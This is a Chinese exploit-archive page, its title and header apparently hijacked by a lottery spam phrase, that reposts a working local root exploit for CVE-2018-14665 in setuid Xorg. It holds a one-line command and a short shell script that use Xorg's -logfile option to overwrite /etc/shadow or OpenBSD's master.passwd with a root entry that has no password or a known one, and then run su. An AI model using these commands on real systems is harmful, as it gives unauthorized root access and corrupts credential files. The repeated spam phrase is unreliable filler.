吉林十一选五多少期      
吉林十一选五多少期 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:吉林十一选五多少期>安全文章>文章資料>Exploits>文章內容
xorg-x11-server Local Privilege Escalation
來源:hackerfantastic at googlemail.com 作者:Fantastic 發布時間:2018-10-29  
#CVE-2018-14665 - a LPE exploit via //X.org  fits in a tweet
 
cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su
 
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
 
 
 
 
 
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b___FCKpd___08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -
 

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·libtiff 4.0.9 - Decodes Arbitr
·xorg-x11-server Local Root
·Adult Filter 1.0 - Buffer Over
·Linux systemd Line Splitting
·BORGChat 1.0.0 build 438 - Den
·Linux systemd Symlink Derefere
·WebExec Authenticated User Cod
·ASRock Drivers Privilege Escal
·WebEx Local Service Permission
·WordPress Arforms 3.5.1 Arbitr
·Apache OFBiz 16.11.04 - XML Ex
·吉林十一选五多少期
  推薦廣告
CopyRight © 2002-2019 吉林十一选五多少期 All Rights Reserved